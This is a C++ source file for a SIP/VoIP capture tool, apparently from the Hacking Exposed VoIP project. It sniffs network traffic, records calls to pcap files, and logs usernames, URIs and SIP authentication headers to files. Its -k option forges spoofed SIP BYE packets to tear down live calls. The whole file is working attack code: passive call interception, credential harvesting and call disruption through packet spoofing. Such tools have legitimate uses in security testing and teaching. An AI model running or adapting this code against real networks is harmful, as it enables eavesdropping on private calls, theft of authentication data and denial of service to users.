//-----------------------------------------------------------------------------
//
// Capture.cpp
//
//    Copyright (C) 2004  Mark D. Collier
//
//    This program is free software; you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation; either version 2 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program; if not, write to the Free Software
//    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
//   Author: Mark D. Collier   - 12/01/2006   v1.1
//                   Mark D. Collier   -  04/26/2004  v1.0
//         www.securelogix.com - mark.collier@securelogix.com
//         www.hackingexposedvoip.com
//
//-----------------------------------------------------------------------------

#include <arpa/inet.h>
#include <errno.h>
#include <net/ethernet.h>
#include <netinet/ether.h> 
#include <netinet/if_ether.h> 
#include <netinet/in.h>
#include <netinet/ip.h> 
#include <netinet/udp.h> 
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include <pcap.h>
#include <libnet.h>

#include "util.h"
#include "hash.h"
#include "SipHeader.h"
#include "SipMessage.h"
#include "SdpMessage.h"

#define malloc  mymalloc
#define free    myfree
#define strdup  mystrdup
#define strndup mystrndup

#define ETHERNET_DUMP 0
#define IP_DUMP       0
#define UDP_DUMP      0


static char *            mDeviceName;
static bool              mKillCalls;
static char *            mKillCallsInvolving;
static char *            mOutputName;
static char *            mCaptureFileName;
static int               mCaptureFileNameSize;
static bool              mSplit;
static pcap_dumper_t **  mSingleDumper;
static pcap_t *          mPcapHandle;
static int               mDumperCounter;
static int               mCallCounter;
static FILE *            mUserNamesFile;
static FILE *            mUrisFile;
static FILE *            mAuthDataFile;

#define mUrisHeadersCount 5
static char *  mUrisHeaders[mUrisHeadersCount] =
{
    "contact",
    "f",
    "from",
    "t",
    "to"
};

#define mAuthDataHeadersCount 5
static char *  mAuthDataHeaders[mAuthDataHeadersCount] =
{
    "authentication-info",
    "authorization",
    "proxy-authenticate",
    "proxy-authorization",
    "www-authenticate"
};

#define SIP_SCRATCH_SIZE 4096
static u_int8_t  mSipScratch[SIP_SCRATCH_SIZE];

class  dumpDestination
{
    public:
        in_addr_t          Address;
        int                Port;
        char *             CallId;
        pcap_dumper_t **   Dumper;
        dumpDestination *  PreviousByPort;
        dumpDestination *  NextByPort;
        dumpDestination *  PreviousByCallId;
        dumpDestination *  NextByCallId;
};

#define DUMP_TABLE_SIZE 1024   // Use powers of 2
#define DUMP_TABLE_MASK 0x03ff // DUMP_TABLE_SIZE - 1
static dumpDestination *  dumpDestByPort[DUMP_TABLE_SIZE];
static dumpDestination *  dumpDestByCallId[DUMP_TABLE_SIZE];


void sendSpoofedSipPacket( u_int8_t *  aEthSrc,
                           u_int8_t *  aEthDst,
                           u_int32_t   aIpSrc,
                           u_int32_t   aIpDst,
                           u_int16_t   aSrcPort,
                           u_int16_t   aDstPort,
                           u_int8_t *  aPayload )
{
    libnet_t *     libnetHandle;
    char           libnetErrorBuffer[LIBNET_ERRBUF_SIZE];
    libnet_ptag_t  udp;
    libnet_ptag_t  ip;
    libnet_ptag_t  eth;
    int            written;
    int            length;

    length = strlen( ( char * )aPayload );

    libnetHandle = libnet_init( LIBNET_LINK, mDeviceName, libnetErrorBuffer );
    udp = libnet_build_udp( aSrcPort,
                            aDstPort,
                            LIBNET_UDP_H + length,
                            0,
                            ( u_int8_t * )aPayload,
                            length,
                            libnetHandle,
                            0 );
    if ( udp == -1 )
    {
        fprintf( stderr, "%s:%d: Error: %s\n", __FILE__, __LINE__,
                 libnet_geterror( libnetHandle ) );
        return;
    }
    ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + length,
                            0,
                            242,
                            0,
                            64,
                            IPPROTO_UDP,
                            0,
                            aIpSrc,
                            aIpDst,
                            NULL,
                            0,
                            libnetHandle,
                            0 );
    if ( ip == -1 )
    {
        fprintf( stderr, "%s:%d: Error: %s\n", __FILE__, __LINE__,
                 libnet_geterror( libnetHandle ) );
        return;
    }
    eth = libnet_build_ethernet( aEthDst, aEthSrc, ETHERTYPE_IP, NULL, 0,
                                 libnetHandle, 0 );
    if ( eth == -1 )
    {
        fprintf( stderr, "%s:%d: Error: %s\n", __FILE__, __LINE__,
                 libnet_geterror( libnetHandle ) );
        return;
    }
    written = libnet_write( libnetHandle );
    if ( written == -1 )
    {
        fprintf( stderr, "%s:%d: Error: %s\n", __FILE__, __LINE__,
                 libnet_geterror( libnetHandle ) );
        return;
    }
    libnet_destroy( libnetHandle );
}


void  capturedUdp( const struct pcap_pkthdr *  aPacketHeader,
                   const u_char *              aPacketPayload )
{
    const struct ip *               ipHeader;
    const struct udphdr *           udpHeader;
    u_int                           len;
    SipMessage *                    sip;
    dumpDestination *               destination;
    dumpDestination *               destinationNext;
    SipHeader *                     header;
    SipHeader *                     toHeader;
    SipUri *                        toUri;
    SipHeader *                     fromHeader;
    SipUri *                        fromUri;
    SipHeader *                     callIdHeader;
    SipHeader *                     cseqHeader;
    int                             cseq;
    SdpMessage *                    sdp;
    SdpMessage::MediaDescription *  sdpMedia;
    char *                          callId;
    unsigned long int               callIdHash;
    int                             port;
    struct stat                     fileStat;
    char *                          sipPacket;
    bool                            dumped;
    struct in_addr                  tmpaddr;
    SdpMessage::ConnectionData *    connectionData;
    char *                          cp;
    int                             index;
    int                             index2;
    time_t                          timeval;
    struct tm *                     tmval;
    char                            outputline[81];

    dumped    = false;
    ipHeader  = ( struct ip * )(  aPacketPayload
                                + sizeof( struct ether_header ) );
    udpHeader = ( struct udphdr * )(  aPacketPayload
                                    + sizeof( struct ether_header )
                                    + ipHeader->ip_hl * 4 );
    len       =  aPacketHeader->caplen - sizeof( struct ether_header )
               - ipHeader->ip_hl * 4;

#if UDP_DUMP
    unsigned int ix;
    printf( "- UDP -" );
    for ( ix = 0; ix < len; ix++ )
    {
        if ( ix % 16 == 0 )
        {
            printf( "\n" );
        }
        printf( "%02x ", *( ( u_char * )( udpHeader ) + ix ) );
    }
    printf( ix % 16 ? "\n- UDP -\n" : "- UDP -\n" );
#endif

    port = ntohs( udpHeader->dest );
    destination = dumpDestByPort[port & DUMP_TABLE_MASK];
    while (   destination
           && (   destination->Port != port
               || destination->Address != ipHeader->ip_dst.s_addr ) )
    {
        destination = destination->NextByPort;
    }

    if ( !destination )
    {
        sip = new SipMessage( ipHeader->ip_src.s_addr,
                              udpHeader->source,
                              ipHeader->ip_dst.s_addr,
                              udpHeader->dest,
                              ( char * )( udpHeader ) + sizeof( struct udphdr ),
                              len - sizeof( struct udphdr ) );
        if ( !sip->GetError() )
        {
            if ( !mOutputName )
            {
                time( &timeval );
                tmval = localtime( &timeval );
                outputline[80] = '\0';
                snprintf( outputline, 80,
                          "___[%d-%02d-%02d %02d:%02d]"
                          "___[%d.%d.%d.%d:%d->%d.%d.%d.%d:%d]"
                          "___________________________________________________",
                          tmval->tm_year + 1900,
                          tmval->tm_mon + 1,
                          tmval->tm_mday,
                          tmval->tm_hour,
                          tmval->tm_min,
                          ipHeader->ip_src.s_addr       & 0xff,
                          ipHeader->ip_src.s_addr >>  8 & 0xff,
                          ipHeader->ip_src.s_addr >> 16 & 0xff,
                          ipHeader->ip_src.s_addr >> 24 & 0xff,
                          ntohs( udpHeader->source ),
                          ipHeader->ip_dst.s_addr       & 0xff,
                          ipHeader->ip_dst.s_addr >>  8 & 0xff,
                          ipHeader->ip_dst.s_addr >> 16 & 0xff,
                          ipHeader->ip_dst.s_addr >> 24 & 0xff,
                          ntohs( udpHeader->dest ) );
                sipPacket = sip->GetPacket();
                printf( "%s\n%s\n", outputline, sipPacket );
                if ( *( sipPacket + strlen( sipPacket ) - 1 ) != '\n' )
                {
                    printf( "\n" );
                }
                free( sipPacket );
            }
            if ( mUserNamesFile || mUrisFile )
            {
                for ( index = 0; index < mUrisHeadersCount; index++ )
                {
                    header = sip->GetHeader( mUrisHeaders[index] );
                    if ( header )
                    {
                        for ( index2 = header->GetIdentifierCount() - 1;
                              index2 >= 0;
                              index2-- )
                        {
                            toUri = header->GetIdentifier( index2 )->GetUri();
                            if ( toUri )
                            {
                                if ( mUserNamesFile )
                                {
                                    cp = toUri->GetUser();
                                    if ( cp )
                                    {
                                        fprintf( mUserNamesFile, "%s\n", cp );
                                    }
                                }
                                if ( mUrisFile )
                                {
                                    cp = toUri->GetFullText();
                                    if ( cp )
                                    {
                                        fprintf( mUrisFile, "%s\n", cp );
                                    }
                                }
                            }
                        }
                    }
                }
            }
            if ( mAuthDataFile )
            {
                index2 = 0;
                for ( index = 0; index < mAuthDataHeadersCount; index++ )
                {
                    header = sip->GetHeader( mAuthDataHeaders[index] );
                    if ( header )
                    {
                        index2++;
                        fprintf( mAuthDataFile, "%s\n", header->GetFullText() );
                    }
                }
                if ( index2 )
                {
                    fprintf( mAuthDataFile, "-----------------------------\n" );
                }
            }
            callId = NULL;
            callIdHeader = sip->GetHeader( "call-id" );
            if ( !callIdHeader )
            {
                callIdHeader = sip->GetHeader( "i" );
            }
            if ( callIdHeader )
            {
                callId = callIdHeader->GetValue();
            }
            if ( !callId )
            {
                callId = "";
            }
            callIdHash =  hash( ( unsigned char * )callId, strlen( callId ), 0 )
                        & DUMP_TABLE_MASK;
            if ( strcmp( sip->GetRequestMethod(), "BYE" ) == 0 )
            {
                destination = dumpDestByCallId[callIdHash];
                while ( destination )
                {
                    destinationNext = destination->NextByCallId;
                    if ( strcmp( destination->CallId, callId ) == 0 )
                    {
                        if ( !dumped )
                        {
                            if ( *destination->Dumper )
                            {
                                pcap_dump( ( u_char * )*destination->Dumper,
                                           aPacketHeader,
                                           aPacketPayload );
                                dumped = true;
                            }
                        }
                        if ( destination->PreviousByCallId )
                        {
                            destination->PreviousByCallId->NextByCallId =
                                                  destination->NextByCallId;
                        }
                        else
                        {
                            dumpDestByCallId[callIdHash] =
                                                  destination->NextByCallId;
                        }
                        if ( destination->NextByCallId )
                        {
                            destination->NextByCallId->PreviousByCallId =
                                              destination->PreviousByCallId;
                        }
                        if ( destination->PreviousByPort )
                        {
                            destination->PreviousByPort->NextByPort =
                                                    destination->NextByPort;
                        }
                        else
                        {
                            dumpDestByPort[  destination->Port
                                           & DUMP_TABLE_MASK] =
                                                    destination->NextByPort;
                        }
                        if ( destination->NextByPort )
                        {
                            destination->NextByPort->PreviousByPort =
                                              destination->PreviousByPort;
                        }
                        if ( mSplit && *destination->Dumper )
                        {
                            pcap_dump_close( *destination->Dumper );
                            *destination->Dumper = NULL;
                        }
                        delete destination;
                    }
                    destination = destinationNext;
                }
            }
            else if (   mKillCalls
                     && strcmp( sip->GetRequestMethod(), "ACK" ) == 0 )
            {
                toHeader = sip->GetHeader( "to" );
                if ( !toHeader )
                {
                    toHeader = sip->GetHeader( "t" );
                }
                toUri = NULL;
                if ( toHeader && toHeader->GetIdentifierCount() > 0 )
                {
                    toUri = toHeader->GetIdentifier( 0 )->GetUri();
                }
                fromHeader = sip->GetHeader( "from" );
                if ( !fromHeader )
                {
                    fromHeader = sip->GetHeader( "f" );
                }
                fromUri = NULL;
                if ( fromHeader && fromHeader->GetIdentifierCount() > 0 )
                {
                    fromUri = fromHeader->GetIdentifier( 0 )->GetUri();
                }
                cseq = 0;
                cseqHeader = sip->GetHeader( "cseq" );
                if ( cseqHeader )
                {
                    cseq = atoi( cseqHeader->GetValue() );
                }
                if (   toUri && fromUri && callId && cseqHeader
                    && (   !mKillCallsInvolving
                        || strcasestr( toHeader->GetValue(),
                                       mKillCallsInvolving )
                        || strcasestr( fromHeader->GetValue(),
                                       mKillCallsInvolving ) ) )
                {

                    cseq++;
                    snprintf( ( char * )mSipScratch, SIP_SCRATCH_SIZE,
                              "BYE %s SIP/%d.%d\r\n"
                              "Via: SIP/2.0/UDP %d.%d.%d.%d:%d;branch="
                              "z9hG4bK-c366246a-2791-4411-9304-9216c84a7ca1\r\n"
                              "Max-Forwards: 70\r\n"
                              "To: %s\r\n"
                              "From: %s\r\n"
                              "Call-Id: %s\r\n"
                              "CSeq: %d BYE\r\n"
                              "Contact: <%s>\r\n"
                              "Content-Length: 0\r\n"
                              "\r\n",
                              fromUri->GetFullText(),
                              sip->GetMajorVersion(),
                              sip->GetMinorVersion(),
                              ipHeader->ip_dst.s_addr       & 0xff,
                              ipHeader->ip_dst.s_addr >>  8 & 0xff,
                              ipHeader->ip_dst.s_addr >> 16 & 0xff,
                              ipHeader->ip_dst.s_addr >> 24 & 0xff,
                              ntohs( udpHeader->source ),
                              fromHeader->GetValue(),
                              toHeader->GetValue(),
                              callId,
                              cseq,
                              toUri->GetFullText() );
                    sendSpoofedSipPacket( ( u_int8_t * )aPacketPayload,
                                          ( u_int8_t * )aPacketPayload + 6,
                                          ipHeader->ip_dst.s_addr,
                                          ipHeader->ip_src.s_addr,
                                          port,
                                          ntohs( udpHeader->source ),
                                          mSipScratch );
                    snprintf( ( char * )mSipScratch, SIP_SCRATCH_SIZE,
                              "BYE %s SIP/%d.%d\r\n"
                              "Via: SIP/2.0/UDP %d.%d.%d.%d:%d;branch="
                              "z9hG4bK-c366246a-2791-4411-9304-9216c84a7ca2\r\n"
                              "Max-Forwards: 70\r\n"
                              "To: %s\r\n"
                              "From: %s\r\n"
                              "Call-Id: %s\r\n"
                              "CSeq: %d BYE\r\n"
                              "Contact: <%s>\r\n"
                              "Content-Length: 0\r\n"
                              "\r\n",
                              toUri->GetFullText(),
                              sip->GetMajorVersion(),
                              sip->GetMinorVersion(),
                              ipHeader->ip_src.s_addr       & 0xff,
                              ipHeader->ip_src.s_addr >>  8 & 0xff,
                              ipHeader->ip_src.s_addr >> 16 & 0xff,
                              ipHeader->ip_src.s_addr >> 24 & 0xff,
                              port,
                              toHeader->GetValue(),
                              fromHeader->GetValue(),
                              callId,
                              cseq,
                              fromUri->GetFullText() );
                    sendSpoofedSipPacket( ( u_int8_t * )aPacketPayload + 6,
                                          ( u_int8_t * )aPacketPayload,
                                          ipHeader->ip_src.s_addr,
                                          ipHeader->ip_dst.s_addr,
                                          ntohs( udpHeader->source ),
                                          port,
                                          mSipScratch );
                }
            }
            else
            {
                header = sip->GetHeader( "content-type" );
                if ( header && strcasecmp( header->GetValue(),
                                           "application/sdp" ) == 0 )
                {
                    sdp = new SdpMessage( sip->GetContent() );
                    sdpMedia = sdp->GetMediaDescriptions();
                    while ( sdpMedia )
                    {
                        destination =
                                    dumpDestByPort[  sdpMedia->GetPortIP4Value()
                                                   & DUMP_TABLE_MASK];
                        while (   destination
                               && (     destination->Port
                                     != sdpMedia->GetPortIP4Value()
                                   ||   destination->Address
                                     != ipHeader->ip_dst.s_addr ) )
                        {
                            destination = destination->NextByPort;
                        }
                        if ( !destination )
                        {
                            destination = new dumpDestination();
                            destinationNext = dumpDestByCallId[callIdHash];
                            while (   destinationNext
                                   && strcmp( destinationNext->CallId,
                                              callId ) != 0 )
                            {
                                destinationNext = destinationNext->NextByCallId;
                            }
                            if ( destinationNext)
                            {
                                destination->Dumper = destinationNext->Dumper;
                            }
                            else
                            {
                                mCallCounter++;
                                if ( !mOutputName )
                                {
                                    destination->Dumper =
                                           ( pcap_dumper_t ** )
                                           malloc( sizeof( pcap_dumper_t ** ) );
                                    if ( !destination->Dumper )
                                    {
                                        fprintf(
                                                stderr,
                                                "%s:%d: Error: Out of memory\n",
                                                __FILE__, __LINE__ );
                                        exit( 1 );
                                    }
                                    *destination->Dumper = NULL;
                                }
                                else if ( mSplit )
                                {
                                    mDumperCounter++;
                                    snprintf( mCaptureFileName,
                                              mCaptureFileNameSize,
                                              "%s.%d.pcap",
                                              mOutputName,
                                              mDumperCounter );
                                    while ( stat( mCaptureFileName,
                                                  &fileStat ) == 0 )
                                    {
                                        mDumperCounter++;
                                        snprintf( mCaptureFileName,
                                                  mCaptureFileNameSize,
                                                  "%s.%d.pcap",
                                                  mOutputName,
                                                  mDumperCounter );
                                    }
                                    destination->Dumper =
                                           ( pcap_dumper_t ** )
                                           malloc( sizeof( pcap_dumper_t ** ) );
                                    if ( !destination->Dumper )
                                    {
                                        fprintf(
                                                stderr,
                                                "%s:%d: Error: Out of memory\n",
                                                __FILE__, __LINE__ );
                                        exit( 1 );
                                    }
                                    *destination->Dumper = pcap_dump_open(
                                                             mPcapHandle,
                                                             mCaptureFileName );
                                    if ( *destination->Dumper == NULL )
                                    {
                                        fprintf( stderr, "pcap_dump_open: %s\n",
                                                 pcap_geterr( mPcapHandle ) );
                                    }
                                }
                                else
                                {
                                    destination->Dumper = mSingleDumper;
                                }
                            }
                            connectionData =
                               sdp->GetMediaDescriptions()->GetConnectionData();
                            if ( !connectionData )
                            {
                                connectionData = sdp->GetConnectionData();
                            }
                            tmpaddr.s_addr = 0;
                            if ( connectionData )
                            {
                                inet_aton( connectionData->GetAddress(),
                                           &tmpaddr );
                            }
                            destination->Address = tmpaddr.s_addr;
                            destination->Port = sdpMedia->GetPortIP4Value();
                            destination->CallId = strdup( callId );
                            destination->PreviousByPort = NULL;
                            if ( dumpDestByPort[  destination->Port
                                                & DUMP_TABLE_MASK] )
                            {
                                dumpDestByPort[  destination->Port
                                               & DUMP_TABLE_MASK]->
                                               PreviousByPort = destination;
                            }
                            destination->NextByPort =
                                     dumpDestByPort[  destination->Port
                                                    & DUMP_TABLE_MASK];
                            dumpDestByPort[  destination->Port
                                           & DUMP_TABLE_MASK] =
                                                                destination;
                            destination->PreviousByCallId = NULL;
                            if ( dumpDestByCallId[callIdHash] )
                            {
                                dumpDestByCallId[callIdHash]->
                                                          PreviousByCallId =
                                                                destination;
                            }
                            destination->NextByCallId =
                                               dumpDestByCallId[callIdHash];
                            dumpDestByCallId[callIdHash] = destination;
                        }
                        sdpMedia = sdpMedia->GetNext();
                    }
                    delete sdp;
                }
            }
            if ( !dumped && !destination && callId )
            {
                destination = dumpDestByCallId[callIdHash];
                while ( destination )
                {
                    if ( strcmp( destination->CallId, callId ) == 0 )
                    {
                        break;
                    }
                    destination = destination->NextByCallId;
                }
            }
        }
        delete sip;
    }

    if ( !dumped && destination && *destination->Dumper )
    {
        pcap_dump( ( u_char * )*destination->Dumper, aPacketHeader,
                   aPacketPayload );
    }
}

void  capturedIp( const struct pcap_pkthdr *  aPacketHeader,
                  const u_char *              aPacketPayload )
{
    const struct ip *  ipHeader;
    u_int              len;

    ipHeader = ( struct ip * )(  aPacketPayload
                               + sizeof( struct ether_header ) );
    len      = aPacketHeader->caplen - sizeof( struct ether_header );

#if IP_DUMP
    unsigned int ix;
    printf( "- IP -" );
    for ( ix = 0; ix < len; ix++ )
    {
        if ( ix % 16 == 0 )
        {
            printf( "\n" );
        }
        printf( "%02x ", *( ( u_char * )( ipHeader ) + ix ) );
    }
    printf( ix % 16 ? "\n- IP -\n" : "- IP -\n" );
#endif

    if (   len < sizeof( struct ip )
        || ipHeader->ip_hl < 5
        || ipHeader->ip_v != 4
        || len < ntohs( ipHeader->ip_len )
        || ntohs( ipHeader->ip_off ) & ( IP_MF | IP_OFFMASK ) )
    {
        return;
    }

    switch ( ipHeader->ip_p )
    {
        case IPPROTO_UDP:
            capturedUdp( aPacketHeader, aPacketPayload );
            break;
    }
}

void  capturedEthernet( u_char *                    aArgs,
                        const struct pcap_pkthdr *  aPacketHeader,
                        const u_char *              aPacketPayload )
{
#if ETHERNET_DUMP
    unsigned int ix;
    printf( "- ETHERNET -" );
    for ( ix = 0; ix < aPacketHeader->caplen; ix++ )
    {
        if ( ix % 16 == 0 )
        {
            printf( "\n" );
        }
        printf( "%02x ", *( aPacketPayload + ix ) );
    }
    printf( ix % 16 ? "\n- ETHERNET -\n" : "- ETHERNET -\n" );
#endif

    if ( aPacketHeader->caplen < 14 )
    {
        return;
    }
    switch ( ntohs( ( ( struct ether_header * )aPacketPayload )->ether_type ) )
    {
        case ETHERTYPE_IP:
            capturedIp( aPacketHeader, aPacketPayload );
            break;
    }
}

void  sig_handler( int  signal )
{
    int                ix;
    dumpDestination *  destination;
    int                count;

    if ( mUserNamesFile )
    {
        fclose( mUserNamesFile );
        mUserNamesFile = NULL;
    }
    if ( mUrisFile )
    {
        fclose( mUrisFile );
        mUrisFile = NULL;
    }
    if ( mAuthDataFile )
    {
        fclose( mAuthDataFile );
        mAuthDataFile = NULL;
    }

    count = 0;
    for ( ix = 0; ix < DUMP_TABLE_SIZE; ix++ )
    {
        destination = dumpDestByCallId[ix];
        while ( destination )
        {
            if ( *destination->Dumper )
            {
                count++;
                pcap_dump_close( *destination->Dumper );
                *destination->Dumper = NULL;
            }
            destination = destination->NextByCallId;
        }
    }
    if ( mOutputName )
    {
        printf( "%d calls captured\n", mCallCounter );
    }
    else
    {
        printf( "%d calls seen\n", mCallCounter );
    }
    printf( "%d calls were still open\n", count );
    exit( 0 );
}


int  main( int  aArgC, char **  aArgV )
{ 
    char                error[PCAP_ERRBUF_SIZE];
    struct bpf_program  filter;
    bpf_u_int32         netmask;
    bpf_u_int32         netaddr;
    int                 ix;
    int                 opt;
    char *              userNamesFileName;
    char *              urisFileName;
    char *              authDataFileName;

    mDeviceName          = NULL;
    mKillCalls           = false;
    mKillCallsInvolving  = NULL;
    mOutputName          = NULL;
    mCaptureFileName     = NULL;
    mCaptureFileNameSize = 0;
    mSplit               = false;
    mUserNamesFile       = NULL;
    userNamesFileName    = NULL;
    mUrisFile            = NULL;
    urisFileName         = NULL;
    mAuthDataFile        = NULL;
    authDataFileName     = NULL;

    mSingleDumper = ( pcap_dumper_t ** )malloc( sizeof( pcap_dumper_t ** ) );
    if ( !mSingleDumper )
    {
        fprintf( stderr, "%s:%d: Error: Out of memory\n", __FILE__, __LINE__ );
        exit( 1 );
    }
    *mSingleDumper = NULL;

    for ( ix = 0; ix < DUMP_TABLE_SIZE; ix++ )
    {
        dumpDestByPort[ix] = NULL;
        dumpDestByCallId[ix] = NULL;
    }

    while ( true )
    {
        opt = getopt( aArgC, aArgV, "a:i:k:n:su:w:" );
        if ( opt < 0 )
        {
            break;
        }
        switch ( opt )
        {
            case 'a':
                authDataFileName = optarg;
                break;
            case 'i':
                mDeviceName = optarg;
                break;
            case 'k':
                mKillCalls = true;
                if ( strcasecmp( "all", optarg ) != 0 )
                {
                    mKillCallsInvolving = optarg;
                }
                break;
            case 'n':
                userNamesFileName = optarg;
                break;
            case 's':
                mSplit = true;
                break;
            case 'u':
                urisFileName = optarg;
                break;
            case 'w':
                mOutputName = optarg;
                break;
            default:
                fprintf( stderr, "Unknown option %c\n", opt );
                exit( 1 );
        }
    }

    if ( !mDeviceName )
    {
        mDeviceName = pcap_lookupdev( error );
        if ( mDeviceName == NULL )
        {
            fprintf( stderr, "pcap_lookupdev: %s\n", error );
            return 1;
        }
    }

    if ( userNamesFileName )
    {
        mUserNamesFile = fopen( userNamesFileName, "a" );
        if ( !mUserNamesFile )
        {
            perror( "fopen user names file" );
            fprintf( stderr, "%s:%d: Error: Could not open %s\n",
                     __FILE__, __LINE__, userNamesFileName );
            return 1;
        }
    }

    if ( urisFileName )
    {
        mUrisFile = fopen( urisFileName, "a" );
        if ( !mUrisFile )
        {
            perror( "fopen uris file" );
            fprintf( stderr, "%s:%d: Error: Could not open %s\n",
                     __FILE__, __LINE__, urisFileName );
            return 1;
        }
    }

    if ( authDataFileName )
    {
        mAuthDataFile = fopen( authDataFileName, "a" );
        if ( !mAuthDataFile )
        {
            perror( "fopen auth data file" );
            fprintf( stderr, "%s:%d: Error: Could not open %s\n",
                     __FILE__, __LINE__, authDataFileName );
            return 1;
        }
    }

    mDumperCounter = 0;
    mCallCounter = 0;

    mPcapHandle = pcap_open_live( mDeviceName, BUFSIZ, 1, -1, error );
    if ( mPcapHandle == NULL )
    {
        fprintf( stderr, "pcap_open_live: %s\n", error);
        return 1;
    }

    pcap_lookupnet( mDeviceName, &netaddr, &netmask, error );
    if ( pcap_compile( mPcapHandle, &filter, "udp", 0, netaddr ) == -1 )
    {
        fprintf( stderr, "pcap_compile:\n") ;
        return 1;
    }

    if ( pcap_setfilter( mPcapHandle, &filter ) == -1 )
    {
        fprintf( stderr, "pcap_setfilter:\n");
        return 1;
    }

    if ( mOutputName )
    {
        if ( mSplit )
        {
            mCaptureFileNameSize =  strlen( mOutputName )
                                  + 14 // .xxxxxxxx.pcap
                                  + 1;
            mCaptureFileName = ( char * )malloc( mCaptureFileNameSize );
            if ( !mCaptureFileName )
            {
                fprintf(
                        stderr,
                        "%s:%d: Error: Out of memory\n",
                        __FILE__, __LINE__ );
                exit( 1 );
            }
        }
        else
        {
            *mSingleDumper = pcap_dump_open( mPcapHandle, mOutputName );
            if ( *mSingleDumper == NULL )
            {
                fprintf( stderr, "pcap_dump_open: %s\n",
                         pcap_geterr( mPcapHandle ) );
            }
        }
    }

    signal( SIGTERM, sig_handler );
    signal( SIGINT, sig_handler );

    pcap_loop( mPcapHandle, -1, capturedEthernet, NULL );

    return 0;
}

